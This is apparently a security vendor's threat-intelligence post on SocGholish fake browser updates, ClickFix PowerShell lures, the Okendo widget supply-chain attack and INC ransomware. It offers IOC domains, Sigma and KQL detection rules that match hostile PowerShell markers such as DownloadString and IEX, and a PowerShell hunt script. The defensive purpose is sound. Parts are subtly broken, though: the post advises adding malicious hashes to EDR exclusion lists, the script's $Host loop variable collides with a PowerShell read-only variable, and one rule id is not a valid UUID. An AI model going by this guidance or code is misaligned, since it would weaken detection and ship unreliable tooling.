Back to Intelligence

SocGholish Fake Updates, SmartRAT ClickFix & Infostealer Supply Chain: OTX Pulse Analysis

SA
Security Arsenal Team
June 20, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of high-risk initial access vectors leading to credential theft and ransomware. The ecosystem remains active despite Operation Endgame disruptions to SocGholish (TA569), with indicators showing residual infrastructure and evolving tactics. Threat actors are increasingly relying on "ClickFix" techniques—fake browser updates and CAPTCHA screens—to deceive users into executing malicious PowerShell scripts, delivering SmartRAT and Banana RAT. Simultaneously, a significant supply chain attack has been identified targeting the Okendo Reviews widget, impacting over 18,000 e-commerce brands by injecting malicious JavaScript loaders for NetSupport and SmartRAT. Additionally, INC ransomware has matured into a top-tier Rust-based RaaS operation, leveraging double-extortion and cross-platform capabilities, while general infostealer trends show a heavy reliance on cracked software distributing LummaC2 and AgentTesla.

Threat Actor / Malware Profile

Adversaries

  • GOLD PRELUDE (TA569): Historically operates SocGholish, utilizing SEO poisoning and compromised WordPress sites to distribute fake browser updates.
  • SmartApeSG: Identified in the Okendo supply chain attack, injecting malicious JavaScript into legitimate third-party widgets.
  • INC Ransomware: A rapidly evolving RaaS group capitalizing on the void left by LockBit/BlackCat, utilizing Rust-based encryptors for Windows and Linux/ESXi.

Malware Families

  • SocGholish: A malware framework (JScript) serving as a loader for IcedID, Pikabot, and Bumblebee. It relies on social engineering via fake browser update prompts.
  • SmartRAT: A PowerShell-based banking trojan and RAT featuring encrypted C2 communications, often distributed via ClickFix campaigns.
  • LummaC2 / AgentTesla: Prevalent infostealers distributed via typosquatting domains and malicious S3 buckets, focusing on harvesting browser credentials and system information.

TTPs & Attack Chain

  1. Initial Access:
    • Drive-by Compromise: Compromised WordPress sites serving fake browser updates (SocGholish).
    • Supply Chain Compromise: Malicious JS injection in trusted third-party widgets (Okendo).
    • Social Engineering: Typosquatting domains with fake CAPTCHAs/BSODs (ClickFix) triggering PowerShell execution.
  2. Execution: Malicious JScript (SocGholish) or PowerShell commands (ClickFix) download and execute payloads.
  3. Persistence: Malware establishes persistence via scheduled tasks or DLL side-loading.
  4. Objectives: Credential theft (banking, corporate), lateral movement, and deployment of ransomware (INC, LockBit) for extortion.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators critical for detection:

  • Hostnames & Domains: A list of compromised WordPress sites (e.g., trademark.iglesiaelarca.com) acting as SocGholish redirectors, and typosquatted domains (e.g., windowsupdate-cdn.com, crefisa.online) used in ClickFix campaigns.
  • URLs: Specific endpoints used in the Okendo supply chain attack (e.g., api.wigetticks.com) facilitating data exfiltration or payload staging.
  • File Hashes: SHA256 and MD5 hashes associated with INC ransomware payloads, loaders, and infostealers (LummaC2).

Operational Guidance: SOC teams should immediately block listed hostnames and domains at the perimeter. File hashes should be integrated into EDR exclusion lists for scanning. The Okendo-related URLs require inspection of web proxy logs to identify compromised internal hosts reaching out to these C2 domains.

Detection Engineering

Sigma Rules

YAML
title: Suspicious PowerShell Execution via Browser (ClickFix)
id: 9d87a2e1-5f3c-4b9a-9a5e-4a4e5c5d6e7f
description: Detects PowerShell spawned by a browser process with encoded commands, indicative of ClickFix or fake update campaigns.
status: experimental
date: 2026/06/20
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6428... # ClickFix Pulse
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - \chrome.exe
            - \msedge.exe
            - \firefox.exe
        Image|endswith: \powershell.exe
        CommandLine|contains:
            - -enc
            - -encodedcommand
            - DownloadString
            - IEX
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: SocGholish Fake Browser Update Pattern
date: 2026/06/20
id: b1c2d3e4-f5a6-4b7c-8d9e-0f1a2b3c4d5e
description: Detects execution of mshta.exe or wscript.exe by a browser, typical of Fake Browser Update campaigns.
status: experimental
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427... # SocGholish Pulse
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - \chrome.exe
            - \msedge.exe
            - \firefox.exe
        Image|endswith:
            - \mshta.exe
            - \wscript.exe
            - \cscript.exe
    condition: selection
falsepositives:
    - Low
level: critical
---
title: Okendo Supply Chain C2 Communication
date: 2026/06/20
id: e5f6g7h8-i9j0-4k1l-m2n3-o4p5q6r7s8t9
description: Detects network connections to known malicious domains associated with the Okendo Reviews widget supply chain attack.
status: experimental
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6429... # Okendo Pulse
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - wigetticks.com
            - wizzleticks.com
    condition: selection
falsepositives:
    - None
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and Fake Update process patterns
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in ("chrome.exe", "msedge.exe", "firefox.exe")
| where FileName in ("powershell.exe", "mshta.exe", "wscript.exe", "cmd.exe")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| extend EncodedCommand = iff(ProcessCommandLine contains "-enc" or ProcessCommandLine contains "-encodedcommand", "Yes", "No")
| where EncodedCommand == "Yes"

PowerShell Hunt Script

PowerShell
# IOC Scanner for SocGholish, ClickFix, and Okendo Indicators
$MaliciousHosts = @(
    "trademark.iglesiaelarca.com",
    "windowsupdate-cdn.com",
    "crefisa.online",
    "api.wigetticks.com",
    "api.wizzleticks.com"
)

Write-Host "Checking DNS Cache for malicious host resolution..."
$DnsCache = Get-DnsClientCache
foreach ($Host in $MaliciousHosts) {
    $Found = $DnsCache | Where-Object { $_.Entry -like "*$Host*" }
    if ($Found) {
        Write-Warning "[ALERT] Found malicious DNS entry: $($Found.Entry) - IP: $($Found.Data)"
    }
}

Write-Host "Checking for suspicious process parent-child relationships (Browser -> PowerShell)..."
$SuspiciousProcs = Get-WmiObject Win32_Process | Where-Object {
    $_.ParentProcessId -ne 0 -and 
    ($_.Name -eq "powershell.exe" -or $_.Name -eq "mshta.exe")
}

foreach ($Proc in $SuspiciousProcs) {
    $Parent = Get-WmiObject Win32_Process | Where-Object { $_.ProcessId -eq $Proc.ParentProcessId }
    if ($Parent.Name -match "(chrome|msedge|firefox).exe") {
        Write-Warning "[ALERT] Suspicious execution: $($Parent.Name) spawned $($Proc.Name) (PID: $($Proc.ProcessId))"
    }
}

Response Priorities

Immediate

  • Block IOCs: Implement network blocks for all listed hostnames, domains, and IP addresses at the firewall and proxy level.
  • Hunt Artifacts: Execute the provided PowerShell script across endpoints to identify active DNS cache entries or process anomalies indicative of infection.

24 Hours

  • Credential Reset: If infection is suspected (SmartRAT, LummaC2), force a password reset for all accounts accessed from affected endpoints, prioritizing finance and admin credentials.
  • Web Proxy Analysis: Review proxy logs for connections to the Okendo-related URLs (wigetticks.com, wizzleticks.com) to identify scope of supply chain compromise.

1 Week

  • Supply Chain Governance: Audit all third-party JavaScript libraries and widgets (e.g., Okendo) running on public-facing websites. Implement Subresource Integrity (SRI) where possible.
  • Browser Hardening: Deploy policies to restrict automatic downloads and script execution from the internet, and configure browser security settings to block unsigned/malicious extensions.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialssocgholishsmartratinfostealerclickfixsupply-chain

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action